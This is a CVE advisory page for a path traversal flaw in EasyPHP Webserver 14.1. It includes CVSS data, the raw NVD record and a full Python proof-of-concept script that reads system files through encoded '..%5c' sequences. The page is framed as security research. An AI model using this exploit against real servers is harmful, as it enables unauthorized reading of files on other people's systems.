Security Vulnerability Report
CVE-2023-53944 CVSS 6.5 MEDIUM

CVE-2023-53944

Published: 2025-12-18 20:15:53
Last Modified: 2025-12-26 16:55:31

Description

EasyPHP Webserver 14.1 contains a path traversal vulnerability that allows remote users with low privileges to access files outside the document root by bypassing SecurityManager restrictions. Attackers can send GET requests with encoded directory traversal sequences like /..%5c..%5c to read system files such as /windows/win.ini.

CVSS Details

CVSS Score (v3.1; the raw JSON below also carries a CVSS 4.0 base score of 7.1, HIGH)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:easyphp:webserver:14.1:*:*:*:*:*:*:* - VULNERABLE
EasyPHP Webserver 14.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
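import requests
import sys

# CVE-2023-53944 PoC - EasyPHP Webserver Path Traversal
# Target: EasyPHP Webserver 14.1
# Vulnerability: Path traversal via encoded directory traversal sequences
#
# Detection note: every request this script sends carries the literal
# "..%5c" sequence in the URL path, so it can be matched (case-insensitively)
# in web-server access logs or by a WAF/IDS rule, provided request URIs are
# logged or inspected.


def exploit(target_url, file_path='/windows/win.ini'):
    """
    Exploit path traversal vulnerability in EasyPHP Webserver

    Sends one GET request whose path is the fixed prefix /..%5c..%5c followed
    by file_path with every '/' and '\\' replaced by %5c.

    Args:
        target_url: Base URL of the vulnerable server
        file_path: Path to the file to read (default: Windows system file)

    Returns:
        The response body as text when the server answers HTTP 200,
        None on any other status code or on a request error.
        A 200 alone does not prove the file was served (an error or landing
        page can also answer 200); compare the body with the expected file
        before recording a finding.
    """
    # Encode the path traversal sequence using %5c (encoded backslash)
    # Pattern: /..%5c..%5c + target file path
    encoded_path = file_path.replace('/', '%5c').replace('\\', '%5c')
    traversal = '/..%5c..%5c'

    # Construct the malicious URL
    exploit_url = f"{target_url.rstrip('/')}{traversal}{encoded_path}"

    print(f"[*] Target URL: {exploit_url}")
    print(f"[*] Attempting to read: {file_path}")

    try:
        # Redirects are not followed: a redirect could send the request to a
        # host outside the authorized test scope, and a 200 from the redirect
        # target (e.g. a login page) would be misreported as a successful read.
        response = requests.get(exploit_url, timeout=10, allow_redirects=False)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

    if response.status_code != 200:
        print(f"[*] Request failed with status code: {response.status_code}")
        return None

    print("[!] Success! File content retrieved:")
    print("-" * 50)
    print(response.text)
    print("-" * 50)
    return response.text


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2023-53944.py <target_url> [file_path]")
        print("Example: python cve-2023-53944.py http://target.com /windows/win.ini")
        sys.exit(1)

    target = sys.argv[1]
    file_path = sys.argv[2] if len(sys.argv) > 2 else '/windows/win.ini'

    # Exit status reflects the outcome so a patch-verification job can tell
    # "file returned" (0) from "not returned / request error" (2).
    sys.exit(0 if exploit(target, file_path) is not None else 2)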

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53944", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.097", "lastModified": "2025-12-26T16:55:30.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EasyPHP Webserver 14.1 contains a path traversal vulnerability that allows remote users with low privileges to access files outside the document root by bypassing SecurityManager restrictions. Attackers can send GET requests with encoded directory traversal sequences like /..%5c..%5c to read system files such as /windows/win.ini."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:easyphp:webserver:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "25E85EE7-0612-4478-A212-5E5F90944A3D"}]}]}], "references": [{"url": "https://www.easyphp.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51430", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/easyphp-webserver-path-traversal-via-directory-traversal-sequences", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51430", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}